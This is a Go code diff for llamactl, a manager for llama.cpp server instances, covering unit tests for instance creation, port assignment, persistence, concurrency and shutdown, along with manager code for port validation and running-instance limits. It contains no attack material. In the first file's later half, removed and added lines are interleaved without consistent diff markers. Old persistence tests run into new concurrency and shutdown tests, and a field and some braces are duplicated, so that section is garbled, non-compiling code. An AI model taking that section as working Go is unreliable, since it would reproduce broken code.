t.Errorf("Expected port in range 8000-9000, got %d", port)
}
}
func TestCreateInstance_PortConflictDetection(t *testing.T) {
manager := createTestManager()
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080, // Explicit port
},
}
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: 8080, // Same port - should conflict
},
}
// Create first instance
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// Try to create second instance with same port
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
}
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
manager := createTestManager()
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create multiple instances and verify they get different ports
instance1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
instance2, err := manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
port1 := instance1.GetOptions().Port
port2 := instance2.GetOptions().Port
if port1 == port2 {
t.Errorf("Expected different ports, both got %d", port1)
}
}
func TestCreateInstance_PortExhaustion(t *testing.T) {
// Create manager with very small port range
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 8001}, // Only 2 ports available
MaxInstances: 10, // Higher than available ports
}
manager := manager.NewInstanceManager(cfg)
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances to exhaust all ports
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to port exhaustion
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when ports are exhausted")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
t.Errorf("Expected port exhaustion error, got: %v", err)
}
}
func TestDeleteInstance_PortRelease(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Create instance with specific port
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete the instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-instance", options)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestGetInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance first
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Retrieve it
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
}
func TestGetInstance_NotFound(t *testing.T) {
manager := createTestManager()
_, err := manager.GetInstance("nonexistent")
if err == nil {
t.Error("Expected error for nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestListInstances(t *testing.T) {
manager := createTestManager()
// Initially empty
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected 0 instances, got %d", len(instances))
}
// Create some instances
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err = manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// List should return both
instances, err = manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 2 {
t.Errorf("Expected 2 instances, got %d", len(instances))
}
// Check names are present
names := make(map[string]bool)
for _, inst := range instances {
names[inst.Name] = true
}
if !names["instance1"] || !names["instance2"] {
t.Error("Expected both instance1 and instance2 in list")
}
}
func TestDeleteInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete it
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should no longer exist
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
}
func TestDeleteInstance_NotFound(t *testing.T) {
manager := createTestManager()
err := manager.DeleteInstance("nonexistent")
if err == nil {
t.Error("Expected error for deleting nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestUpdateInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Update it
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
if updated.GetOptions().Port != 8081 {
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
}
}
func TestUpdateInstance_NotFound(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.UpdateInstance("nonexistent", options)
if err == nil {
t.Error("Expected error for updating nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestPersistence_InstancePersistedOnCreation(t *testing.T) {
// Create temporary directory for persistence
tempDir := t.TempDir()
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
+TimeoutCheckInterval: 5,
}
-manager := manager.NewInstanceManager(cfg)
+// Test instance persistence on creation
+manager1 := manager.NewInstanceManager(cfg)
options := &instance.CreateInstanceOptions{
-LlamaServerOptions: llamacpp.LlamaServerOptions{
+BackendType: backends.BackendTypeLlamaCpp,
+LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
-// Create instance
-_, err := manager.CreateInstance("test-instance", options)
+_, err := manager1.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
@@ -522,359 +72,102 @@ func TestPersistence_InstancePersistedOnCreation(t *testing.T) {
t.Errorf("Expected persistence file %s to exist", expectedPath)
}
-// Verify file contains correct data
-data, err := os.ReadFile(expectedPath)
+// Test loading instances from disk
+manager2 := manager.NewInstanceManager(cfg)
+instances, err := manager2.ListInstances()
if err != nil {
-t.Fatalf("Failed to read persistence file: %v", err)
+t.Fatalf("ListInstances failed: %v", err)
}
+if len(instances) != 1 {
+t.Fatalf("Expected 1 loaded instance, got %d", len(instances))
+}
+if instances[0].Name != "test-instance" {
+t.Errorf("Expected loaded instance name 'test-instance', got %q", instances[0].Name)
+}
-var persistedInstance map[string]interface{}
-if err := json.Unmarshal(data, &persistedInstance); err != nil {
-t.Fatalf("Failed to unmarshal persisted data: %v", err)
-}
+// Test port map populated from loaded instances (port conflict should be detected)
+_, err = manager2.CreateInstance("new-instance", options) // Same port
+if err == nil || !strings.Contains(err.Error(), "port") {
+t.Errorf("Expected port conflict error, got: %v", err)
+}
-if persistedInstance["name"] != "test-instance" {
-t.Errorf("Expected name 'test-instance', got %v", persistedInstance["name"])
+// Test file deletion on instance deletion
+err = manager2.DeleteInstance("test-instance")
}
}
func TestPersistence_InstancePersistedOnUpdate(t *testing.T) {
tempDir := t.TempDir()
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
}
manager := manager.NewInstanceManager(cfg)
// Create instance
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
_, err = manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
// Verify persistence file was updated
expectedPath := filepath.Join(tempDir, "test-instance.json")
data, err := os.ReadFile(expectedPath)
if err != nil {
t.Fatalf("Failed to read persistence file: %v", err)
}
var persistedInstance map[string]interface{}
if err := json.Unmarshal(data, &persistedInstance); err != nil {
t.Fatalf("Failed to unmarshal persisted data: %v", err)
}
// Check that the options were updated
options_data, ok := persistedInstance["options"].(map[string]interface{})
if !ok {
t.Fatal("Expected options to be present in persisted data")
}
if options_data["model"] != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %v", options_data["model"])
}
}
func TestPersistence_InstanceFileDeletedOnDeletion(t *testing.T) {
tempDir := t.TempDir()
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
}
manager := manager.NewInstanceManager(cfg)
// Create instance
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
expectedPath := filepath.Join(tempDir, "test-instance.json")
// Verify file exists
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
t.Fatal("Expected persistence file to exist before deletion")
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
-// Verify file was deleted
if _, err := os.Stat(expectedPath); !os.IsNotExist(err) {
t.Error("Expected persistence file to be deleted")
}
}
-func TestPersistence_InstancesLoadedFromDisk(t *testing.T) {
-tempDir := t.TempDir()
-// Create JSON files manually (simulating previous run)
-instance1JSON := `{
-"name": "instance1",
-"running": false,
-"options": {
-"model": "/path/to/model1.gguf",
-"port": 8080
-}
-}`
-instance2JSON := `{
-"name": "instance2",
-"running": false,
-"options": {
-"model": "/path/to/model2.gguf",
-"port": 8081
-}
-}`
-// Write JSON files
+func TestConcurrentAccess(t *testing.T) {
+mgr := createTestManager()
+defer mgr.Shutdown()
+// Test concurrent operations
+var wg sync.WaitGroup
+errChan := make(chan error, 10)
+// Concurrent instance creation
+for i := range 5 {
+wg.Add(1)
+go func(index int) {
+defer wg.Done()
err := os.WriteFile(filepath.Join(tempDir, "instance1.json"), []byte(instance1JSON), 0644)
if err != nil {
t.Fatalf("Failed to write test JSON file: %v", err)
}
err = os.WriteFile(filepath.Join(tempDir, "instance2.json"), []byte(instance2JSON), 0644)
if err != nil {
t.Fatalf("Failed to write test JSON file: %v", err)
}
// Create manager - should load instances from disk
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
}
manager := manager.NewInstanceManager(cfg)
// Verify instances were loaded
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 2 {
t.Fatalf("Expected 2 loaded instances, got %d", len(instances))
}
// Check instances by name
instancesByName := make(map[string]*instance.Process)
for _, inst := range instances {
instancesByName[inst.Name] = inst
}
instance1, exists := instancesByName["instance1"]
if !exists {
t.Error("Expected instance1 to be loaded")
} else {
if instance1.GetOptions().Model != "/path/to/model1.gguf" {
t.Errorf("Expected model '/path/to/model1.gguf', got %q", instance1.GetOptions().Model)
}
if instance1.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", instance1.GetOptions().Port)
}
}
instance2, exists := instancesByName["instance2"]
if !exists {
t.Error("Expected instance2 to be loaded")
} else {
if instance2.GetOptions().Model != "/path/to/model2.gguf" {
t.Errorf("Expected model '/path/to/model2.gguf', got %q", instance2.GetOptions().Model)
}
if instance2.GetOptions().Port != 8081 {
t.Errorf("Expected port 8081, got %d", instance2.GetOptions().Port)
}
}
}
func TestPersistence_PortMapPopulatedFromLoadedInstances(t *testing.T) {
tempDir := t.TempDir()
// Create JSON file with specific port
instanceJSON := `{
"name": "test-instance",
"running": false,
"options": {
"model": "/path/to/model.gguf",
"port": 8080
}
}`
err := os.WriteFile(filepath.Join(tempDir, "test-instance.json"), []byte(instanceJSON), 0644)
if err != nil {
t.Fatalf("Failed to write test JSON file: %v", err)
}
// Create manager - should load instance and register port
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
}
manager := manager.NewInstanceManager(cfg)
// Try to create new instance with same port - should fail due to conflict
options := &instance.CreateInstanceOptions{
-LlamaServerOptions: llamacpp.LlamaServerOptions{
-Model: "/path/to/model2.gguf",
+BackendType: backends.BackendTypeLlamaCpp,
+LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: 8080, // Same port as loaded instance
},
}
_, err = manager.CreateInstance("new-instance", options)
if err == nil {
t.Error("Expected error for port conflict with loaded instance")
}
if !strings.Contains(err.Error(), "port") || !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
}
func TestPersistence_CompleteInstanceDataRoundTrip(t *testing.T) {
tempDir := t.TempDir()
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Create first manager and instance with comprehensive options
manager1 := manager.NewInstanceManager(cfg)
autoRestart := false
maxRestarts := 10
restartDelay := 30
originalOptions := &instance.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080,
Host: "localhost",
CtxSize: 4096,
GPULayers: 32,
Temperature: 0.7,
TopK: 40,
TopP: 0.9,
Verbose: true,
FlashAttn: false,
Lora: []string{"adapter1.bin", "adapter2.bin"},
HFRepo: "microsoft/DialoGPT-medium",
},
} }
instanceName := fmt.Sprintf("concurrent-test-%d", index)
if _, err := mgr.CreateInstance(instanceName, options); err != nil {
errChan <- err
}
}(i)
}
-originalInstance, err := manager1.CreateInstance("roundtrip-test", originalOptions)
+// Concurrent list operations
for i := 0; i < 3; i++ {
wg.Add(1)
go func() {
defer wg.Done()
if _, err := mgr.ListInstances(); err != nil {
errChan <- err
}
}()
}
wg.Wait()
close(errChan)
// Check for any errors during concurrent access
for err := range errChan {
t.Errorf("Concurrent access error: %v", err)
}
}
func TestShutdown(t *testing.T) {
mgr := createTestManager()
// Create test instance
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
-// Create second manager (simulating restart) - should load the instance
-manager2 := manager.NewInstanceManager(cfg)
-loadedInstance, err := manager2.GetInstance("roundtrip-test")
-if err != nil {
+// Shutdown should not panic
+mgr.Shutdown()
+// Multiple shutdowns should not panic
+mgr.Shutdown()
t.Fatalf("GetInstance failed after reload: %v", err)
}
// Compare all data
if loadedInstance.Name != originalInstance.Name {
t.Errorf("Name mismatch: original=%q, loaded=%q", originalInstance.Name, loadedInstance.Name)
}
originalOpts := originalInstance.GetOptions()
loadedOpts := loadedInstance.GetOptions()
// Compare restart options
if *loadedOpts.AutoRestart != *originalOpts.AutoRestart {
t.Errorf("AutoRestart mismatch: original=%v, loaded=%v", *originalOpts.AutoRestart, *loadedOpts.AutoRestart)
}
if *loadedOpts.MaxRestarts != *originalOpts.MaxRestarts {
t.Errorf("MaxRestarts mismatch: original=%v, loaded=%v", *originalOpts.MaxRestarts, *loadedOpts.MaxRestarts)
}
if *loadedOpts.RestartDelay != *originalOpts.RestartDelay {
t.Errorf("RestartDelay mismatch: original=%v, loaded=%v", *originalOpts.RestartDelay, *loadedOpts.RestartDelay)
}
// Compare llama server options
if loadedOpts.Model != originalOpts.Model {
t.Errorf("Model mismatch: original=%q, loaded=%q", originalOpts.Model, loadedOpts.Model)
}
if loadedOpts.Port != originalOpts.Port {
t.Errorf("Port mismatch: original=%d, loaded=%d", originalOpts.Port, loadedOpts.Port)
}
if loadedOpts.Host != originalOpts.Host {
t.Errorf("Host mismatch: original=%q, loaded=%q", originalOpts.Host, loadedOpts.Host)
}
if loadedOpts.CtxSize != originalOpts.CtxSize {
t.Errorf("CtxSize mismatch: original=%d, loaded=%d", originalOpts.CtxSize, loadedOpts.CtxSize)
}
if loadedOpts.GPULayers != originalOpts.GPULayers {
t.Errorf("GPULayers mismatch: original=%d, loaded=%d", originalOpts.GPULayers, loadedOpts.GPULayers)
}
if loadedOpts.Temperature != originalOpts.Temperature {
t.Errorf("Temperature mismatch: original=%f, loaded=%f", originalOpts.Temperature, loadedOpts.Temperature)
}
if loadedOpts.TopK != originalOpts.TopK {
t.Errorf("TopK mismatch: original=%d, loaded=%d", originalOpts.TopK, loadedOpts.TopK)
}
if loadedOpts.TopP != originalOpts.TopP {
t.Errorf("TopP mismatch: original=%f, loaded=%f", originalOpts.TopP, loadedOpts.TopP)
}
if loadedOpts.Verbose != originalOpts.Verbose {
t.Errorf("Verbose mismatch: original=%v, loaded=%v", originalOpts.Verbose, loadedOpts.Verbose)
}
if loadedOpts.FlashAttn != originalOpts.FlashAttn {
t.Errorf("FlashAttn mismatch: original=%v, loaded=%v", originalOpts.FlashAttn, loadedOpts.FlashAttn)
}
if loadedOpts.HFRepo != originalOpts.HFRepo {
t.Errorf("HFRepo mismatch: original=%q, loaded=%q", originalOpts.HFRepo, loadedOpts.HFRepo)
}
// Compare slice fields
if !reflect.DeepEqual(loadedOpts.Lora, originalOpts.Lora) {
t.Errorf("Lora mismatch: original=%v, loaded=%v", originalOpts.Lora, loadedOpts.Lora)
}
// Verify created timestamp is preserved
if loadedInstance.Created != originalInstance.Created {
t.Errorf("Created timestamp mismatch: original=%d, loaded=%d", originalInstance.Created, loadedInstance.Created)
}
} }
// Helper function to create a test manager with standard config
@@ -887,6 +180,7 @@ func createTestManager() manager.InstanceManager {
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
+TimeoutCheckInterval: 5,
}
return manager.NewInstanceManager(cfg)
}


@@ -2,12 +2,15 @@ package manager
import (
"fmt"
+"llamactl/pkg/backends"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"os"
"path/filepath"
)
+type MaxRunningInstancesError error
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock()
@@ -27,10 +30,6 @@ func (im *instanceManager) CreateInstance(name string, options *instance.CreateI
return nil, fmt.Errorf("instance options cannot be nil")
}
-if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
-return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
-}
name, err := validation.ValidateInstanceName(name)
if err != nil {
return nil, err
@@ -44,29 +43,27 @@ func (im *instanceManager) CreateInstance(name string, options *instance.CreateI
im.mu.Lock()
defer im.mu.Unlock()
+// Check max instances limit after acquiring the lock
+if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
+return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
+}
// Check if instance with this name already exists
if im.instances[name] != nil {
return nil, fmt.Errorf("instance with name %s already exists", name)
}
-// Assign a port if not specified
-if options.Port == 0 {
-port, err := im.getNextAvailablePort()
-if err != nil {
-return nil, fmt.Errorf("failed to get next available port: %w", err)
-}
-options.Port = port
-} else {
-// Validate the specified port
-if _, exists := im.ports[options.Port]; exists {
-return nil, fmt.Errorf("port %d is already in use", options.Port)
-}
-im.ports[options.Port] = true
-}
+// Assign and validate port for backend-specific options
+if err := im.assignAndValidatePort(options); err != nil {
+return nil, err
+}
-inst := instance.NewInstance(name, &im.instancesConfig, options)
+statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
+im.onStatusChange(name, oldStatus, newStatus)
+}
+inst := instance.NewInstance(name, &im.instancesConfig, options, statusCallback)
im.instances[inst.Name] = inst
-im.ports[options.Port] = true
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
@@ -108,7 +105,7 @@ func (im *instanceManager) UpdateInstance(name string, options *instance.CreateI
}
// Check if instance is running before updating options
-wasRunning := instance.Running
+wasRunning := instance.IsRunning()
// If the instance is running, stop it first
if wasRunning {
@@ -146,11 +143,11 @@ func (im *instanceManager) DeleteInstance(name string) error {
return fmt.Errorf("instance with name %s not found", name)
}
-if instance.Running {
+if instance.IsRunning() {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
-delete(im.ports, instance.GetOptions().Port)
+delete(im.ports, instance.GetPort())
delete(im.instances, name)
// Delete the instance's config file if persistence is enabled
@@ -167,15 +164,20 @@ func (im *instanceManager) DeleteInstance(name string) error {
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
+maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
-if instance.Running {
+if instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already running", name)
}
+if maxRunningExceeded {
+return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
+}
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
@@ -190,6 +192,17 @@ func (im *instanceManager) StartInstance(name string) (*instance.Process, error)
return instance, nil
}
+func (im *instanceManager) IsMaxRunningInstancesReached() bool {
+im.mu.RLock()
+defer im.mu.RUnlock()
+if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
+return true
+}
+return false
+}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock()
@@ -199,7 +212,7 @@ func (im *instanceManager) StopInstance(name string) (*instance.Process, error)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
-if !instance.Running {
+if !instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
}
@@ -239,3 +252,49 @@ func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
return options.LlamaServerOptions.Port
}
}
return 0
}
// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
options.LlamaServerOptions.Port = port
}
}
}
// assignAndValidatePort assigns a port if not specified and validates it's not in use
func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
currentPort := im.getPortFromOptions(options)
if currentPort == 0 {
// Assign a port if not specified
port, err := im.getNextAvailablePort()
if err != nil {
return fmt.Errorf("failed to get next available port: %w", err)
}
im.setPortInOptions(options, port)
// Mark the port as used
im.ports[port] = true
} else {
// Validate the specified port
if _, exists := im.ports[currentPort]; exists {
return fmt.Errorf("port %d is already in use", currentPort)
}
// Mark the port as used
im.ports[currentPort] = true
}
return nil
}


@@ -0,0 +1,229 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"strings"
"testing"
)
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.GetStatus() != instance.Stopped {
t.Error("New instance should not be running")
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetPort()
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
